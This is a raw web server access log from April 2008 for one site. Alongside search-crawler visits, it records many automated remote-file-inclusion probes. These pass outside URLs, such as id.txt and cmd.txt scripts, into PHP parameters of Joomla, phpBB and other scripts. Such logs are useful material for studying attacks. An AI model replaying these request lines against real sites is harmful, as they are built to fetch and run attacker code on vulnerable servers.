195.205.178.120 - - [07/Apr/2008:11:32:48 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:11:32:49 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:11:32:49 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:11:32:55 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:11:33:53 -0700] "GET /logs/access_070811.log HTTP/1.0" 200 94297 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:11:33:53 -0700] "GET /logs/access_071127.log HTTP/1.0" 200 203829 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:11:33:58 -0700] "GET /logs/access_080311.log HTTP/1.0" 200 2109635 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:11:34:43 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:11:34:43 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:11:34:43 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:11:34:43 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:11:34:43 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:11:34:44 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:11:35:57 -0700] "GET /logs/access_071023.log HTTP/1.0" 200 25506 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:11:36:03 -0700] "GET /logs/access_080303.log HTTP/1.0" 200 1014709 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.94 - - [07/Apr/2008:11:36:46 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.19.222 - - [07/Apr/2008:11:36:46 -0700] "GET /logs/access_080222.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.55.174.10 - - [07/Apr/2008:11:36:57 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
72.55.174.10 - - [07/Apr/2008:11:37:03 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:11:37:24 -0700] "GET /logs/access_080311.log HTTP/1.0" 200 2109635 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.12.53.176 - - [07/Apr/2008:11:37:42 -0700] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.buyindianproducts.com/includes/font/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
195.12.53.176 - - [07/Apr/2008:11:37:45 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.buyindianproducts.com/includes/font/test.txt? HTTP/1.1" 200 7371 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:11:38:13 -0700] "GET /logs/access_080311.log HTTP/1.0" 200 2109635 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:11:38:24 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:11:38:24 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:11:38:24 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:11:38:29 -0700] "GET /logs/access_070729.log HTTP/1.0" 200 26979 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:11:38:49 -0700] "GET /logs/access_080213.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:11:38:50 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:11:38:50 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:11:38:57 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:11:38:59 -0700] "GET /logs/access_080127.log/index1.php?=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:11:38:59 -0700] "GET /logs/access_080127.log/index1.php?=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:11:39:00 -0700] "GET /index1.php?=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:11:39:00 -0700] "GET /index1.php?=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:11:39:00 -0700] "GET /logs/index1.php?=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:11:39:01 -0700] "GET /logs/index1.php?=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:11:39:10 -0700] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path[docroot]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.26.137.64 - - [07/Apr/2008:11:39:14 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
58.26.137.64 - - [07/Apr/2008:11:39:22 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
74.6.11.236 - - [07/Apr/2008:11:39:38 -0700] "GET /bikes/cb750K6/?M=A HTTP/1.0" 200 1610 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:11:39:47 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:11:39:47 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:11:39:47 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.157 - - [07/Apr/2008:11:40:21 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.50 - - [07/Apr/2008:11:40:22 -0700] "GET /minamijewelry/minami_site3.psd HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:11:40:40 -0700] "GET /logs/access_080313.log/index1.php?=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:11:40:41 -0700] "GET /logs/access_080313.log/index1.php?=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:11:40:57 -0700] "GET /logs/access_080215.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://boxstr.com/files/1311840_mm1dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:11:40:57 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://boxstr.com/files/1311840_mm1dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:11:40:57 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://boxstr.com/files/1311840_mm1dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:11:41:04 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.50.53.151 - - [07/Apr/2008:11:41:09 -0700] "GET /logs/access_080127.log/%030/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dzipas.lt/auto-skelbimai/admin/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:11:41:34 -0700] "GET /logs/access_080324.log//faqsupport/samplefaqsupport.php?path[docroot]=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.208.83.232 - - [07/Apr/2008:11:41:57 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.219.253.173 - - [07/Apr/2008:11:41:57 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://scanbax.we.bs/cmd.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
81.208.83.232 - - [07/Apr/2008:11:41:58 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.208.83.232 - - [07/Apr/2008:11:41:59 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:11:42:35 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.230.71.1 - - [07/Apr/2008:11:43:22 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:11:44:27 -0700] "GET /logs/access_080313.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:11:44:34 -0700] "GET /index.php?body=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:11:44:59 -0700] "GET /logs/access_080312.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:11:45:00 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:11:45:00 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:11:46:18 -0700] "GET /logs/access_080312.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:11:46:18 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:11:46:19 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.230.71.1 - - [07/Apr/2008:11:46:32 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.230.71.1 - - [07/Apr/2008:11:46:32 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [07/Apr/2008:11:46:40 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:11:46:43 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:11:46:45 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:11:46:46 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.26.137.64 - - [07/Apr/2008:11:46:48 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
67.212.173.42 - - [07/Apr/2008:11:47:01 -0700] "GET /logs/access_080313.log//main.php?sayfa=http://usil.us/tcl/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:11:47:40 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:11:47:40 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:11:47:40 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:11:47:52 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:11:48:27 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.219.253.173 - - [07/Apr/2008:11:48:36 -0700] "GET /logs/access_080216.log/main.php?x=http://scanbax.we.bs/cmd.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
216.219.253.173 - - [07/Apr/2008:11:48:36 -0700] "GET /main.php?x=http://scanbax.we.bs/cmd.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
216.219.253.173 - - [07/Apr/2008:11:48:37 -0700] "GET /logs/main.php?x=http://scanbax.we.bs/cmd.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
200.230.71.1 - - [07/Apr/2008:11:48:53 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [07/Apr/2008:11:49:08 -0700] "GET /logs/access_080118.log/%030/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dzipas.lt/auto-skelbimai/admin/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [07/Apr/2008:11:49:09 -0700] "GET /%030/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dzipas.lt/auto-skelbimai/admin/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [07/Apr/2008:11:49:09 -0700] "GET /logs/%030/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dzipas.lt/auto-skelbimai/admin/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:11:49:38 -0700] "GET /logs/access_080219.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:11:51:36 -0700] "GET /logs/access_071028.log HTTP/1.0" 200 27183 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.208.83.232 - - [07/Apr/2008:11:51:40 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.12.24.107 - - [07/Apr/2008:11:52:12 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:11:52:36 -0700] "GET /logs/access_080117.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.230.71.1 - - [07/Apr/2008:11:53:51 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.230.71.1 - - [07/Apr/2008:11:53:51 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.108 - - [07/Apr/2008:11:53:55 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.118 - - [07/Apr/2008:11:53:56 -0700] "GET /logs/access_070629.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.230.71.1 - - [07/Apr/2008:11:53:57 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:11:54:15 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:11:54:15 -0700] "GET //config/dbutil.bck.php?confdir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:11:54:15 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:11:54:28 -0700] "GET /logs/access_080215.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:11:54:29 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:11:54:29 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.25.195.93 - - [07/Apr/2008:11:54:49 -0700] "GET /logs/access_080118.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.25.195.93 - - [07/Apr/2008:11:54:49 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.25.195.93 - - [07/Apr/2008:11:54:49 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.25.195.93 - - [07/Apr/2008:11:54:59 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.230.71.1 - - [07/Apr/2008:11:55:36 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [07/Apr/2008:11:55:46 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:11:55:58 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.93 - - [07/Apr/2008:11:55:59 -0700] "GET /logs/access_080127.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:11:56:05 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:11:56:08 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.40.40 - - [07/Apr/2008:11:56:09 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
